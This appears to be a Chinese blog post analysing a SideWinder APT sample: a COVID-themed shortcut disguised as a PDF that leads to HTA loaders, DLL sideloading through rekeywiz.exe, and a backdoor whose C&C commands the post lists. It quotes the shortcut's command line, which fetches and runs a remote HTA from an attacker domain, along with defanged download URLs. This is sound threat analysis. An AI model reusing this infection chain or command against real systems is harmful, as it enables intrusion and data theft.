响尾蛇APT组织的攻击样本分析
该样本伪装成pdf其实是一个lnk,与新冠肺炎相关,诱惑用户点击成功运行后会弹出一个疫情期间课程相关的pdf文档,来迷惑用户。
样本分析
样本信息如下
Policy Guidelines for Online Classes.pdf.lnk
快捷方式所指
%windir%\system32\cftmo.exe http://www.au-edu.km01s.net/images/E2BC769A/16914/11662/84c7b244/3387c59
详细分析
hta分析
.hta是用js写的,去掉hta头尾,用vs调试。
利用DotNetToJScript工具将.Net程序封装在js或者vbs脚本中,通过反序列化加载执行.NET程序。
优化后的DotNetToJScript之GadgetToJScript工具介绍:https://blog.csdn.net/Snake_74/article/details/105295926
字符串base64加密后,又进行异或加密,用的时候动态解密。
内存加载执行释放的LinkZip.dll,通过wmi获取杀软名称和状态。最后传入参数调用LinkZip.dll的work函数。
LinkZip.dll的work函数分析
根据第三个传过来的数据流参数生成PolicyGuidelinesforOnlineClasses.pdf,并弹出
通过第二个参数链接和杀软的拼接下载数据:“ hxxp://www.au-edu.km01s.net/plugins/16914/11662/true/true/ + 杀软+_stg1”
下载第一个参数链接:/hxxp://www.au-edu.km01s.net/cgi/8ee4d36866/16914/11662/eeef4361/file.hta中的文件到temp目录,随机名.hta,并用mshta.exe执行。
file.hta分析
和上一个3387c59[1].hta文件一样用的DotNetToJScript工具将一个.Net的dll封装在js或者vbs脚本中,通过反序列化加载执行.NET程序。
内存加载释放的Stlnstaller.dll,通过调用其work函数执行后续行为
Stlnstaller.dll的work函数分析
先初始化解密硬编码的恶意文件名,域名,注册表键值。
设置rekeywiz.exe自启动
将系统rekeywiz.exe移动到恶意文件夹,设置自启动,
利用参数一传进来的数据生成Duser.dll,
利用参数二和参数三的数据加密后生成随机名.tmp
加密函数
在rekeywiz.exe.config中写入硬编码的配置文件。
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup useLegacyV2RuntimeActivationPolicy="true">
<supportedRuntime version="v2.0.50727"/>
<supportedRuntime version ="v4.0"/>
</startup>
</configuration>
最后启动恶意目录下的rekeywiz.exe,用白加黑的方式启动Duser.dll
Rekeywiz.exe文件为操作系统白文件,运行时会加载edsadu.dll,该文件也是系统自带文件,edsadu.dll加载过程中会加载Duser.dll,实现白加黑攻击:
Duser.dll分析
加载同目录下的.tmp文件,解密并加载,解密出来的dll为SystemAPP.dll
SystemAPP.dll分析
从资源读取信息,初始化各种设置
设置定时器定时获取从服务器下发的指令,执行不同的功能,并向服务器上传受害主机信息。
根据服务端的下发的指令,执行不同的功能。
指令1:获取启动,权限,系统,目录,磁盘,安装信息等。保存成后缀为.sif的文件
指令2:获取磁盘,目录和文件信息,保存成后缀为.flc的文件
指令3:获取选定文件信息,保存成后缀为.fls的文件
指令4:修改配置信息
指令5:设置新的C&C地址
指令6:更新文件上传参数
指令7:设置文件扩展名
指令8:最大选择文件大小
指令9:指定选定文件
指令10:返回
往C&C服务器发送信息
是否有.sif .flc .fls .err 文件,有的话就上传,.err文件是该后门的错误信息
参考文章:https://mp.weixin.qq.com/s/9LfElDbKCrQX1QzGFISFPw
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
